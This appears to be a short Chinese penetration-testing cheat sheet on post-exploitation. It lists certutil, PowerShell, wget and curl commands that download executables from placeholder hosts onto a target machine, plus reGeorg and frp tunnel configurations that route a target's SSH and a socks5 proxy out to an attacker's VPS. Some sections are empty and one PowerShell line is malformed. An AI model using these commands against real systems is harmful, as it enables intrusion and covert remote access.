渗透中常用命令
0x01 信息收集
1.搜索引擎
0x00 后渗透
1.上传下载文件
certutil.exe -urlcache -split -f http://xxx.com/a.php |
powershell "(Cet-Object System.Net.WebClient).Downloadfile('http://example.com/a.exe','a.exe')" |
powershell -c "invoke-WebRequest -Uri 'http://example.com/a.exe' -OutFile 'C:\Windows\Temp\a.exe" |
scp [local_file_path] username@[ip]:/[remote_file_path] |
wget https://xxx.com/1.exe -O 1.exe –limit-rate=500k |
解释:下载1.exe文件,以500k速率下载,并保存为1.exe
curl http://xxx.com/1.exe -O |
解释:下载1.exe文件,保存为同名文件
2.代理
适用于目标不出网,代理自身
neo-reGeorg: https://github.com/L-codes/Neo-reGeorg
reGeorg: https://github.com/sensepost/reGeorg
上传文件
使用python2链接
配置proxifier
适用于目标出网或防火墙后的机器
- 公网vps配置
# frps.ini 默认配置
[common]
bind_port = 7000 - 后台运行服务端
nohup ./frps -c ./frps.ini >/dev/null &
- 目标机器配置
# frpc.ini配置文件
[common]
server_addr = x.x.x.x
server_port = 7000
[http]
type = http
local_port = 80
custom_domains = mzcc_domain.com
[https]
type = https
local_port = 443
custom_domain = mzcc_domain2.com
[ssh]
local_port = 22
remote_port = 6000
# 使用socks5插件
[socks]
type = tcp
remote_port = 6789
plugin = socks5
plugin_user = admin
plugin_passwd = password
# 使用http_proxy插件
[http_proxy]
type = tcp
remote_port = 6789
plugin = http_proxy
plugin_http_user = admin
plugin_http_passwd = password - 后台运行客户端
nohup ./frpc -c ./frpc.ini >/dev/null &
- 实际配置截图
3.提权
本文章由nemu1k5ma编撰,转载请标注哦~